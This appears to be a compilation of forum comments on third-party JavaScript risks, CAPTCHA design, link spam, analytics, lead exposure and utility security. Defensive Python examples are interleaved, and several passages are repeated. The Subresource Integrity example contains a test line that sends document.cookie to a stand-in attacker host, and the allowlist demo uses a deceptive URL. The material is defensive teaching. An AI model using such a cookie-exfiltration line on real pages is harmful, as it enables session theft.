The only "great content" javascript offers is ads and intern-generated page bloat.
JavaScript is not great content. JavaScript enables greatly increased usability of content.
Website owners can and should use the tools at their disposal to present and manipulate content in a way that makes it interesting, fun, informative, and usable. But that shouldn't extend beyond their data. They should also accept responsibility for the safe presentation of other content, like ads. And dynamic execution and safety are at opposite ends of the spectrum.
Random delays only delay an attacker, they may not prevent it.
Let's say you had a reply that took 25 milliseconds if it was cached, and 75 milliseconds if it wasn't. To fix it, you add a delay from 0-100 milliseconds to a reply. The attacker would just have to repeat his attack about six times to see the average response time. He'd figure it out soon enough.
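A simulation of the point made above, added here as an illustration (it is not code from the thread): a server whose reply takes 25 ms from cache and 75 ms otherwise, with a random 0-100 ms delay bolted on. The attacker side simply averages repeated timings; the defender side shows the alternative that actually closes the channel, holding every reply until a fixed deadline. The constants, the `pad_to` parameter and the `margin` threshold are assumptions chosen for the demo.

```python
import random
import statistics

# Constructed service times from the comment: cached vs. uncached reply.
CACHED_MS = 25.0
UNCACHED_MS = 75.0
JITTER_MS = 100.0  # the "0-100 millisecond" random delay proposed as a fix


def respond(cached, rng, pad_to=None):
    """Simulated server reply time in milliseconds.

    Without pad_to: real work plus a uniformly random delay (the weak fix).
    With pad_to: the reply is held until a fixed deadline, so both paths take
    the same time unless the real work itself exceeds the deadline.
    """
    base = CACHED_MS if cached else UNCACHED_MS
    if pad_to is not None:
        return max(base, pad_to)
    return base + rng.uniform(0.0, JITTER_MS)


def mean_timing(cached, samples, rng, pad_to=None):
    """What an observer sees after `samples` requests: the average reply time."""
    return statistics.fmean(respond(cached, rng, pad_to) for _ in range(samples))


def distinguishable(samples, rng, pad_to=None, margin=10.0):
    """Attacker's test: after averaging, is the uncached path measurably slower?

    Random jitter only raises the number of samples needed; averaging removes it.
    Fixed-deadline padding makes the two means identical, so the test fails.
    """
    gap = mean_timing(False, samples, rng, pad_to) - mean_timing(True, samples, rng, pad_to)
    return gap > margin


if __name__ == "__main__":
    rng = random.Random(2013)  # fixed seed so the demo is repeatable
    for n in (1, 6, 60):
        print(f"{n:3d} samples, random jitter : "
              f"{'leaks' if distinguishable(n, rng) else 'hidden'}")
    print("  6 samples, padded to 100ms: "
          f"{'leaks' if distinguishable(6, rng, pad_to=100.0) else 'hidden'}")
```

The jitter is uniform, so its standard deviation is about 29 ms; the standard error of a mean of six samples is about 12 ms against a 50 ms real difference, which is why the author's "about six times" is roughly right. Padding to a deadline costs latency on the fast path but removes the signal instead of diluting it.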
Javascript is cool for offering great content. But why would anyone allow JavaScript from non-primary-domain sources? Advertisers may want their readers to have an "rich, interactive, dynamic experience". Fine, they can offer that: on their site, after the users click over to your site from a static image.
The rest of the linked-in javascript out there is mostly analytics, which do not benefit you as a user.
And as a web site operator, you can be pretty sure that customers don't want to be pwned just because of a javascript brought in by your site. Should you really be linking to others that offer it?
The GP said "he's whitelisting everything." He's doing it wrong - allow the javascript from servers in the *.domain.com for any given page, then selectively enable it from sites that add on features you care about, like disqus and vimeo. It's not a long list, and once you've whitelisted vimeo and vimeocdn for one site, you're not constantly enabling them on others.
I've never heard of anyone using city water for large scale crop irrigation. A greenhouse or two might use city water, but not a field of corn. Farmers will dip a pipe into a creek, river, pond, or lake, and pump the water to the fields. They will drill into the aquifer. They will hire trucks to haul in water. But they will not pay the city to pump the water. And the city probably wouldn't let them even if they wanted to, because they use so much water they'd drain their towers, leaving them nothing to fight fires.
Just damaging a few pumps and valves would shut down a city. Last year Minneapolis had a 20 block area shut down for a day due to a single burst water main, leaving many downtown buildings without potable water. Businesses sent the employees home because they couldn't provide sanitary facilities. Restaurants couldn't cook. The physical damage was minor flooding of a street and a construction site, but the financial damage was large.
So you would have the city leasing expensive lines between plants? I've not met too many people who complained their taxes and water rates were too low, and that they wanted the same service with more security and were willing to pay extra for it. I do, however, see a constant parade of talking heads on TV who bitch incessantly about how high taxes are, how they'll cut taxes when they get in office, or that government budgets should be cut by 10%. Well, their budgets were cut and so the cities cut their corners, and saved whatever money they could, and now their water system is in the hands of hackers. They got exactly what the taxpayers told them they were willing to pay for. We have the exact systems we deserve.
Could they and should they beef up their security? Of course. But does each water system owner even know if they have a problem? These guys are civil engineers in sleepy little towns, not security wonks. They probably didn't install the ICS themselves, they probably contracted all that out, and among the site survey forms they filled out was "choose your system password (minimum 6 characters)" and trusted the vendor to provide the rest of the security (back in 1993 when they installed it.) They might not even know they can change it, or how to change it, or that they need to do something different. Even if they did, the first rule of ICS configuration is "DON'T TOUCH IT!" So don't expect them to get all excited about the chance to make a change.
They would likely learn a lot more about these problems at their state's annual public works conference, if their city can afford to send them this year, and if their state can afford to hold one.
Whoosh.
Actually, lead is quite easily ingested from those sources. Handle a few old tire weights or fishing sinkers that are tarnished, especially if they've been kept in a container where they can rub against each other, and notice how your hands quickly turn gray from the dust. If you then handle a cigarette without washing up, it's all going straight into your bloodstream. If you handle food, some of the lead will be excreted, but about a third will remain in your body.
While no level of exposure to lead is "safe", NIOSH has a limit of 10 µg/dL for regular people, 5 µg/dL for children, and 30 µg/dL for workers occupationally exposed to lead. In adults, symptoms of blood poisoning become evident at 40 µg/dL.
40 µg/dL is not a lot. The average adult has 50 dL of blood, meaning 2,000 µg (two milligrams) is all it takes to reach the limit. According to wolfram alpha, that amount is the size of about three grains of sand.
According to Wikipedia, blood poisoning has been measured at levels of "109–139 µg/dL in indoor shooting range instructors". I find it a bit ironic that the NRA doesn't even mention lead poisoning their own membership. Or maybe that explains a lot about the NRA.
Thanks, Schoolhouse Rock! :-) Actually, I intentionally used the semicolon when a colon or dash would have been more appropriate, but I was trying to play on the original post.
The original "Bullshit, steel and bismuth work fine." could have been written as "Bullshit; steel and bismuth work fine."; "Bullshit! Steel and bismuth work fine."; or even "Bullshit -- steel and bismuth work fine." A comma simply isn't strong enough to separate the interjection when it precedes a list.
Have you ever made an alloy of bullshit, steel, and bismuth? The bullshit adds too much carbon, making it brittle. It's completely unsuitable for bullets.
Semicolons; use them.
There's a reason lead acetate is called "sugar of lead" -- it's sweet! The Romans used to boil grape juice in lead pots to make it, and used it when they couldn't get (or afford) honey. But do we know if the Romans who were affected by the toxicity of lead were ingesting it from the incidental plumbing and other uses, or was it primarily from deliberate ingestion?
Not that I'm agreeing with the NRA that we could tolerate more lead in our environment. I'm just wondering how badly it affected the Romans who didn't eat the stuff deliberately.
How are these easy to create? To create these questions a program would need to start out with an answer. In this case white.
It would then need to randomly generate a unique question that has never been asked before whose answer is white.
This question would need to be easy for humans to solve. But it would need to be impossible to solve by the program that just generated the question.
Ohh and you need to generate millions of these question answer pairs everyday. It also needs to be done quickly. People don't want to wait longer than a second for the CAPTCHA to load.
You're trying to solve the problem once and forever. That encourages the spammers to solve the generic problem. But spammers are lazy, and they will solve only the problem presented. Instead of creating millions of questions, create only ten or a hundred questions. Deploy that until the spammers adapt their robots. Then replace those with ten new questions with a different set. Change the format slightly with the new questions. Force the spammers to chase you. That increases their costs dramatically, but makes your problem as simple as updating ten trivia questions per day.
If the spammers switch to Mechanical Turk, you lose no matter what - you can't block humans with spam intent with a human detector.
That suggests a new approach: instead of a "human detector", we really want a "topic detector." We desire people who are going to post on topic, so make them write an on-topic essay in their sign-up request (or first post from a new account.) Slightly tougher to automate than a CAPTCHA, but it would stop even Mechanical Turks if their goal was volume CAPTCHA busting.
It's quite likely that some forums may prefer only letting in people capable of understanding logic, and there aren't any laws against discriminating against those people.
Next up: Jim Crow-bot laws. "You must make your content accessible to all people, regardless of IQ."
Don't try to beat them all in advance. Spammers have shown they will adapt.
Instead, the key is to update CAPTCHAs only in response to an automated spammer breaking through. Offer ten rotating questions today. If the robots get through, offer ten different rotating questions tomorrow. Make it expensive for the spammers to continually update their robots, and make it cheap for you to update your questions. Beat the spammers on cost.
That implies that spammers are unconcerned whether or not their spam is effective. They're concerned about the ease of spamming.
Which makes perfect sense if you're farming out the task of spamming to cheap labor or to robots - the laborers will follow your instructions, it's not their job to analyze whether or not it's working. So you could warn the users all you want that their spamming will not be effective, but the spammers are not even going to read it, and will pollute your site anyway.
That further implies that even a weak captcha would be enough to stop robots and low-paid laborers. And a friend of mine offers anecdotal evidence that it helps. He added a check box to his site: "check here if you are not a spammer [ ]". It reduced some of the automated spam. But he still reads and approves all comments before they're posted, as there is still spam.
What about a script that produced randomized simplistic captchas: "Human test: two plus three equals [ ] four [ ] five [ ] six" "Please answer this question - three added to three is [ ] six [ ] seven [ ] eight". Vary the wording, vary the answers, vary the correct answer position, vary the position of the question on your sign up screen, and randomize the field name. It will stop robots until someone specifically targets your site.
Better, don't vary anything until you need to. Let the spammers do the work first of adapting to you. They might ignore your site unless you're really worth it to them as a target. Then vary one thing, and see if they "chase" you with a round of fixes. If they continually adapt their robots, (or pay for smarter laborers), then you need to do something else. If not, you've saved yourself a lot of work, and you still have fewer spammers.
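The rotating-question scheme from the comments above, written out as an added example (this is not code from the thread or from any CAPTCHA product): a small pool of arithmetic questions with varied wording, a randomised answer position and a randomised field name, plus a stateless HMAC token so the server does not have to remember which question it issued. The pool, the key, the five-minute lifetime and the token layout are all assumptions for the demo; swapping the pool is the "ten new questions tomorrow" step.

```python
import hashlib
import hmac
import random
import time

# Constructed question pool: the thing you replace when robots get through.
# Each entry is a wording template and the operation it asks for.
QUESTION_POOL = [
    ("Human test: {a} plus {b} equals", lambda a, b: a + b),
    ("Please answer this question - {b} added to {a} is", lambda a, b: a + b),
    ("Quick check: what is {a} times {b}?", lambda a, b: a * b),
    ("Take {b} away from {a} and you get", lambda a, b: a - b),
]

# Constructed demo key; a real deployment would use secrets.token_bytes(32)
# and rotate it together with the question pool.
SERVER_KEY = b"constructed-demo-key-rotate-me"
TOKEN_TTL = 300  # seconds a challenge stays answerable (assumed)


def _mac(field, answer, issued):
    """HMAC binding field name, correct answer and issue time to this server."""
    msg = f"{field}|{answer}|{issued}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def make_challenge(rng=random, now=None):
    """Issue one challenge: prompt text, shuffled choices, random field name, token."""
    issued = int(now if now is not None else time.time())
    template, op = rng.choice(QUESTION_POOL)
    a, b = rng.randint(5, 9), rng.randint(1, 4)  # keeps subtraction positive
    correct = op(a, b)
    choices = {correct}
    while len(choices) < 3:  # two distractors near the real answer
        choices.add(correct + rng.randint(-3, 3))
    choices = list(choices)
    rng.shuffle(choices)  # correct answer lands in a random position
    field = "q%08x" % rng.getrandbits(32)  # random form field name
    token = f"{field}.{issued}.{_mac(field, correct, issued)}"
    return {"prompt": template.format(a=a, b=b), "choices": choices,
            "field": field, "token": token}


def verify(form, token, now=None):
    """Check a submitted form against the token; no server-side session needed.

    A production version would also record used tokens until they expire,
    so one solved challenge cannot be replayed within TOKEN_TTL.
    """
    now = int(now if now is not None else time.time())
    try:
        field, issued, mac = token.split(".")
        issued = int(issued)
    except ValueError:
        return False
    if not 0 <= now - issued <= TOKEN_TTL:
        return False
    answer = form.get(field)
    if answer is None:
        return False
    expected = _mac(field, str(answer).strip(), issued)
    return hmac.compare_digest(expected, mac)


if __name__ == "__main__":
    ch = make_challenge(random.Random(7))
    print(ch["prompt"], ch["choices"], "field:", ch["field"])
```

Because the token is an HMAC over the correct answer rather than the answer itself, a robot that scrapes the form learns the field name and the choices but not which one verifies; it still has to solve the question, and the question set is what you change when it does.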
There's an obvious measure: don't allow untrusted users to provide links at all, and sanitize their data (server side) to mangle any protocol headers from their text, like adding a space before any text matching ://, so the results become http :// , https ://, or mailto ://. No search engine will try to follow those. You are already sanitizing your inputs to restrict users from posting bad stuff like javascript, right? This is just one more thing to check.
You could even get cute using javascript in the browser to flag the text in red if they try to type a URL so they might know in advance they will get nowhere.
Then, to reward the faithful, you can have a karma system that permits voted-up users to post valid links (like stackoverflow). Or you can have an admin manually grant them "good user standing". Either way, your spammer is either contributing real value to your site (which is great) or they've gone away (which is great.)
Adding rel="nofollow" to any links provided by your untrusted commenters is a good start. It's a promise that Google and other search engines won't do any indexing or page ranking based on the href in the same tag.
Spammers have a pretty common M.O. They sign up with an account and use their spam link as their "home page". They then pollute the blog. The obvious spam is repeated variations on the same topic, and looks like "brand name products, products brand name, brand products name, ..."
Lately, link spam is done with a flattering but generic message that looks like it came from a non-native speaker: "I thanking you for your keen insight, have you other similar articles online? I would like to know more how you come to know this." An unwary site operator will often mistake the flattery for a conversation, and allow the spammer to remain a user. (The flattery is script-generated, by the way.) Their "home page" is often a dummy "news portal", which is just replaying whatever feeds they can get. The trick is this news portal has lots of links to the sites the SEO is trying to push.
While rel="nofollow" will render their efforts to associate their spam with a legitimate blog completely wasted, there are two negatives. First, unless the spammer knows it's there, they're going to spam you anyway. Second, it takes away your contribution of "linkiness" for your legitimate users' links to Google's pagerank algorithm. You can fix this with extra work like "probationary" and "full" users, but then you're taking on the task of rating your readers, which may be Sisyphean on a site the size of Slashdot.
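The two comments above describe a tiered treatment of user-supplied links: mangle the `://` for untrusted users, `rel="nofollow"` for probationary users, plain links for users in good standing. The following is an added example of that policy as a server-side renderer (not code from the thread or from Slashdot); the tier names, the regexes and the escape-then-link order are assumptions for the demo.

```python
import html
import re

# Any "scheme://" pair, case-insensitively; this is what gets a space inserted.
SCHEME_RE = re.compile(r"(?i)\b([a-z][a-z0-9+.-]*)://")
# Only http(s) URLs are ever turned into anchors; javascript: and friends never match.
URL_RE = re.compile(r"\bhttps?://[^\s<>\"']+")


def neutralise_links(text):
    """Untrusted tier: 'http://spam.example' becomes 'http ://spam.example'."""
    return SCHEME_RE.sub(r"\1 ://", text)


def contains_link(text):
    """True if the text carries any scheme://, useful for the red-flag hint."""
    return SCHEME_RE.search(text) is not None


def render_comment(text, tier):
    """Render untrusted text as HTML according to the commenter's trust tier.

    tier == "untrusted":    escape everything and break every scheme://
    tier == "probationary": escape, then link http(s) URLs with rel="nofollow"
    tier == "full":         escape, then link http(s) URLs normally
    """
    # Escape first so no tag, attribute or entity the user typed survives.
    escaped = html.escape(text, quote=True)
    if tier == "untrusted":
        return neutralise_links(escaped)
    rel = ' rel="nofollow"' if tier == "probationary" else ""

    def link(match):
        url = match.group(0)  # already HTML-escaped, so safe inside the attribute
        return f'<a href="{url}"{rel}>{url}</a>'

    return URL_RE.sub(link, escaped)


if __name__ == "__main__":
    sample = 'Great article! See http://spam.example/?a=1&b=2 <b>now</b>'  # constructed
    for tier in ("untrusted", "probationary", "full"):
        print(f"{tier:12s} {render_comment(sample, tier)}")
```

Escaping before linking is the important ordering: the URL regex then runs over text that can no longer contain a raw `<` or `"`, so the only anchors in the output are the ones this function wrote.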
Minteye was very thoroughly broken.
http://translate.google.com/translate?sl=ru&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&eotf=1&u=http%3A%2F%2Fhabrahabr.ru%2Fpost%2F167359%2F&act=url
Essentially, the guy realized that jpeg pictures with distortions should have a completely different size than the undistorted picture. But all pictures delivered by minteye were of identical length. He figured they were padding the files with zeros, and he was right. By counting the number of zeros at the end of the file, the local maxima/minima was the correct file. He wrote a few lines of javascript, and it was broke.
It was confusingly worded in TFA. What I eventually figured from it is that it was not used as a discovery mechanism. It looks like it was a test they performed after it was revealed, and the test only confirmed that she was the author.
It was not done to uncover any hidden truths, it was done to demonstrate the correctness of the tool.
Cardinal Richelieu (supposedly) wrote: "If you give me six lines written by the hand of the most honest of men, I will find something in them which will hang him." Will the JStylo-Anonymouth mean that he'd be able to hang everyone who used it?
Like you, I'm running Adblock Plus, Ghostery, and NoScript, and I'm manually whitelisting them in NoScript. It's definitely not a process that is ready for the general public. And like you I find that some sites are indeed difficult to unwind to discover what should really be enabled to restore functionality, and what is not valuable to me.
When I need something from a site, I usually walk the list of NoScript "forbids", enabling them one at a time until it works. I start with any that might appear to be an obvious CDN. I then enable the others, ignoring the known analytics providers until last. Sometimes I have to permit them in Ghostery, too.
Fortunately, the number of sites with their own complex CDN is low. For the shared CDN providers, once you've solved the disqus puzzle on one site, the cure fixes all other sites that use it. So it's not a big deal either. I think I have about a hundred CDNs in my whitelist now, and encountering and unwinding a new one is not even a weekly occurrence any more.
Thanks! I was looking at a Wacom digitizer earlier this year, but the price was a showstopper. The kind with the built in display (which is what would help the most for the kind of work I'm trying to do) were > $1K. If I can get one that not only does digitizing but can be my tablet, that's sounding like a bargain.
I think I'll get one and play with it before I commit to selling the iPad, though.
Analytics allow site owners to see interesting data about their pages - how many visits, etc. The owners can theoretically improve their pages so I get a better experience. And it's free! Who doesn't love a free service?
But the well-known rule is that if someone's giving you something for free, you are the product, not the consumer. So they're selling you out the back end. Think about what they now have to sell.
The answer is that the analytics providers are tracking behavior from search to sale. They are able to tell their paying customers "people who search for 'XYZZY' are buying magic wands for an average of 30 gold pieces each. The higher they are on the search results, the closer they are to the average price. There are 10,000 queries for XYZZY from the US each day, and 500 of those result in sales. If you pay for an XYZZY adword, you'll see about 2,500 of those people. Half the people who searched for XYZZY went to MagicWandRatings.com before buying magic wands, and of those their readers chose PLUGH brand magic rods over XYZZY magic wands 10 to 1. Cart abandonment of 40 G.P. magic wands is at 80%, while cart abandonment of 38 G.P. magic wands is at 70%."
The first thing my SEO guy is going to do is head to MagicWandRatings.com and create a couple dozen sock puppets to tout XYZZY wands. He's going to lie his butt off telling people that XYZZY wands are the fierce green snake's pyjamas. MagicWandRatings.com, once the most trusted site in magic wand ratings, is going to become an unreliable source of information regarding wands thanks to this pollution, yet the search engines are going to continue to lead me there anyway.
Analytics lets the sellers discover the highest going prices to sell their merchandise at. This results in the highest possible prices for me, the consumer. So I get a high-priced crappy wand as a result of analytics.
As a consumer, analytics ultimately do not benefit me. They corrupt the web and cost me money and quality. Thanks, but I'll opt out.
If anyone else used exploits to screw with people, it would be called hacking and they'd probably go to prison, but when the FBI does it, it's 'okay.'
Actually, a judge has yet to find whether it's OK or not. The admissibility of the evidence in these cases is going to hinge on whether or not it was collected through legal means. And no matter which way the judge finds, the loser is going to appeal. As far as I know, this is all untested legal ground.
That considers only the performance viewpoint. As a web developer, it's valuable to him because A) he's not responsible for hosting the latest version himself, B) he's not paying to deliver it to his viewers, and C) his users can use their already cached version of the script they got visiting a different site.
Security-wise, it's risky. If someone's encountered malware that's stored a poisoned version of jquery in their web-cache, and they go to your site, they're already pwned - and now they're on your site with your data!! Even more hilarious, when the bad guys deliver their malware script, they deliver it with a Cache-Control: max-age=86400*30, which means it will live for a month in the victim's cache.
If you want to host jquery on your own CDN, you're dealing with a "known-good" (or at least "known-clean") copy of the code. If you're trusting the user's browser to pull whatever copy they have out of their cache, you're begging to be a target.
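One standard mitigation for the "whatever copy the browser has" problem described in the comment above is Subresource Integrity: the page pins the hash of the third-party script in the `<script>` tag, and the browser refuses to execute bytes whose hash does not match. The following is an added example, not code from the comment's author; the script body is a constructed stand-in for a real library file, and the helper names are hypothetical.

```python
import base64
import hashlib

# Constructed stand-in for a third-party script body. In a real deployment
# you hash the exact bytes of the library file you intend to load.
KNOWN_GOOD_SCRIPT = (
    b"/* hypothetical jquery-like build, constructed for this example */\n"
    b"window.$ = function (s) { return document.querySelector(s); };\n"
)

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_integrity(body: bytes, algo: str = "sha384") -> str:
    """Return the value for a <script integrity="..."> attribute:
    the hash algorithm name, a dash, and the base64-encoded digest."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI only allows sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Build the tag a site operator would emit for a pinned third-party
    script. crossorigin="anonymous" is required for SRI on cross-origin
    scripts so the browser can read the response it is checking."""
    return (f'<script src="{src}" integrity="{sri_integrity(body)}" '
            f'crossorigin="anonymous"></script>')


def verify_integrity(body: bytes, integrity: str) -> bool:
    """Mirror of the browser-side check: accept the bytes only if one of
    the space-separated hashes in the integrity value matches them.
    Unknown algorithms are ignored, as browsers do."""
    for token in integrity.split():
        algo, _, _expected = token.partition("-")
        try:
            if sri_integrity(body, algo) == token:
                return True
        except ValueError:
            continue  # unrecognised algorithm token, skip it
    return False


if __name__ == "__main__":
    tag = script_tag("https://cdn.example.invalid/jquery.min.js", KNOWN_GOOD_SCRIPT)
    print(tag)
    tampered = KNOWN_GOOD_SCRIPT + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"
    print("good copy accepted:", verify_integrity(KNOWN_GOOD_SCRIPT, sri_integrity(KNOWN_GOOD_SCRIPT)))
    print("tampered copy accepted:", verify_integrity(tampered, sri_integrity(KNOWN_GOOD_SCRIPT)))
```

The pin has to be regenerated whenever the library is upgraded, which is exactly the point: the page only runs the bytes its operator vetted, rather than whatever copy the cache or the CDN happens to serve.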
The only "great content" javascript offers is ads and intern-generated page bloat.
JavaScript is not great content. JavaScript enables greatly increased usability of content.
Website owners can and should use the tools at their disposal to present and manipulate content in a way that makes it interesting, fun, informative, and usable. But that shouldn't extend beyond their data. They should also accept responsibility for the safe presentation of other content, like ads. And dynamic execution and safety are at opposite ends of the spectrum.
Random delays only delay an attacker, they may not prevent it.
Let's say you had a reply that took 25 milliseconds if it was cached, and 75 milliseconds if it wasn't. To fix it, you add a delay from 0-100 milliseconds to a reply. The attacker would just have to repeat his attack about six times to see the average response time. He'd figure it out soon enough.
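The arithmetic in the comment above can be checked with a simulation. The following is an added example, not code from the comment's author: it models the 25 ms / 75 ms reply with 0-100 ms of added jitter, lets a simulated attacker average a few samples, and contrasts that with padding every reply to a fixed budget. The timings are constructed, not measured, and the function names are hypothetical.

```python
import random
import statistics

# Constructed model of the reply in the comment: 25 ms when the lookup is
# served from cache, 75 ms when it is not, plus 0-100 ms of random delay.
CACHED_MS = 25.0
UNCACHED_MS = 75.0
JITTER_MAX_MS = 100.0


def reply_time_with_jitter(cached: bool, rng: random.Random) -> float:
    """The proposed 'fix': real work plus uniform random padding."""
    base = CACHED_MS if cached else UNCACHED_MS
    return base + rng.uniform(0.0, JITTER_MAX_MS)


def reply_time_padded(cached: bool, rng: random.Random, budget_ms: float = 100.0) -> float:
    """Mitigation: every reply takes at least budget_ms, so both paths look
    alike. The budget must exceed the slowest real path; an overrun would
    still leak which path was taken."""
    base = CACHED_MS if cached else UNCACHED_MS
    return max(base, budget_ms)


def attacker_guess(samples) -> bool:
    """Average the observed timings and compare against the midpoint of the
    two expected means (assumes the attacker calibrated on known cases).
    Returns True for a guess of 'cached'."""
    midpoint = (CACHED_MS + UNCACHED_MS) / 2 + JITTER_MAX_MS / 2  # 100 ms
    return statistics.fmean(samples) < midpoint


def attacker_accuracy(timing_fn, repeats: int, trials: int, seed: int = 1) -> float:
    """Fraction of trials in which averaging `repeats` replies reveals
    whether the item was cached. Deterministic for a given seed."""
    rng = random.Random(seed)
    correct = 0
    for i in range(trials):
        truth = (i % 2 == 0)  # alternate cached / uncached cases
        samples = [timing_fn(truth, rng) for _ in range(repeats)]
        if attacker_guess(samples) == truth:
            correct += 1
    return correct / trials


if __name__ == "__main__":
    for repeats in (1, 6, 20):
        acc = attacker_accuracy(reply_time_with_jitter, repeats, 1000)
        print(f"jitter, {repeats:2d} samples: attacker right {acc:.1%} of the time")
    acc = attacker_accuracy(reply_time_padded, 6, 1000)
    print(f"fixed padding, 6 samples: attacker right {acc:.1%} of the time")
```

With one sample the jitter leaves the attacker right about three quarters of the time; by six samples the averaged difference of 50 ms stands well clear of the noise, which is the comment's point. Padding to a fixed budget removes the difference entirely, so no number of repetitions helps.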
Javascript is cool for offering great content. But why would anyone allow JavaScript from non-primary-domain sources? Advertisers may want their readers to have a "rich, interactive, dynamic experience". Fine, they can offer that: on their site, after the users click over to your site from a static image.
The rest of the linked-in javascript out there is mostly analytics, which do not benefit you as a user.
And as a web site operator, you can be pretty sure that customers don't want to be pwned just because of a javascript brought in by your site. Should you really be linking to others that offer it?
The GP said "he's whitelisting everything." He's doing it wrong - allow the javascript from servers in the *.domain.com for any given page, then selectively enable it from sites that add on features you care about, like disqus and vimeo. It's not a long list, and once you've whitelisted vimeo and vimeocdn for one site, you're not constantly enabling them on others.
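The "allow *.domain.com, then selectively enable the rest" rule above is easy to get wrong if the host check is a plain suffix match. The following is an added example, not NoScript's code or the commenter's: a small policy function that matches hosts on label boundaries and parses the script URL properly. Determining a page's registrable domain correctly needs the public suffix list, so this example takes the site as an input rather than deriving it; the allowlist entries and URLs are constructed.

```python
from urllib.parse import urlsplit


def is_same_site(script_host: str, site: str) -> bool:
    """True if script_host equals `site` or is a subdomain of it, matched on
    label boundaries so that 'evil-example.com' does not match 'example.com'."""
    script_host = script_host.lower().rstrip(".")
    site = site.lower().rstrip(".")
    return script_host == site or script_host.endswith("." + site)


def script_allowed(page_site: str, script_url: str, allowlist) -> bool:
    """Policy: scripts from the page's own site are allowed; anything else
    must be on the explicit allowlist. Non-network URLs are refused."""
    parts = urlsplit(script_url)
    if parts.scheme not in ("http", "https"):
        return False  # data:, javascript:, etc. are never 'a server we trust'
    script_host = parts.hostname  # strips userinfo, port and case
    if not script_host:
        return False
    if is_same_site(script_host, page_site):
        return True
    return any(is_same_site(script_host, entry) for entry in allowlist)


# Constructed allowlist in the spirit of the comment: a comments widget and
# a video host that a user has enabled once and keeps for every site.
USER_ALLOWLIST = ["disqus.com", "vimeo.com", "vimeocdn.com"]


if __name__ == "__main__":
    cases = [
        "https://static.example.com/app.js",
        "https://evil-example.com/app.js",
        "https://player.vimeo.com/api/player.js",
        "https://cdn.example.com@evil.invalid/x.js",
        "https://tracker.invalid/analytics.js",
    ]
    for url in cases:
        print(f"{url:45s} -> {script_allowed('example.com', url, USER_ALLOWLIST)}")
```

The userinfo case is the one worth noticing: a URL that starts with a trusted hostname can still point at a different server, and only a real URL parser (not a string prefix check) sees that.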
I've never heard of anyone using city water for large scale crop irrigation. A greenhouse or two might use city water, but not a field of corn. Farmers will dip a pipe into a creek, river, pond, or lake, and pump the water to the fields. They will drill into the aquifer. They will hire trucks to haul in water. But they will not pay the city to pump the water. And the city probably wouldn't let them even if they wanted to, because they use so much water they'd drain their towers, leaving them nothing to fight fires.
Just damaging a few pumps and valves would shut down a city. Last year Minneapolis had a 20 block area shut down for a day due to a single burst water main, leaving many downtown buildings without potable water. Businesses sent the employees home because they couldn't provide sanitary facilities. Restaurants couldn't cook. The physical damage was minor flooding of a street and a construction site, but the financial damage was large.
H@xx0n> Hey, look, I've hacked into the City of Endersgame! Watch me pwn their electric generator!
H@xx0n has left the channel.
So you would have the city leasing expensive lines between plants? I've not met too many people who complained their taxes and water rates were too low, and that they wanted the same service with more security and were willing to pay extra for it. I do, however, see a constant parade of talking heads on TV who bitch incessantly about how high taxes are, how they'll cut taxes when they get in office, or that government budgets should be cut by 10%. Well, their budgets were cut and so the cities cut their corners, and saved whatever money they could, and now their water system is in the hands of hackers. They got exactly what the taxpayers told them they were willing to pay for. We have the exact systems we deserve.
Could they and should they beef up their security? Of course. But does each water system owner even know if they have a problem? These guys are civil engineers in sleepy little towns, not security wonks. They probably didn't install the ICS themselves, they probably contracted all that out, and among the site survey forms they filled out was "choose your system password (minimum 6 characters)" and trusted the vendor to provide the rest of the security (back in 1993 when they installed it.) They might not even know they can change it, or how to change it, or that they need to do something different. Even if they did, the first rule of ICS configuration is "DON'T TOUCH IT!" So don't expect them to get all excited about the chance to make a change.
They would likely learn a lot more about these problems at their state's annual public works conference, if their city can afford to send them this year, and if their state can afford to hold one.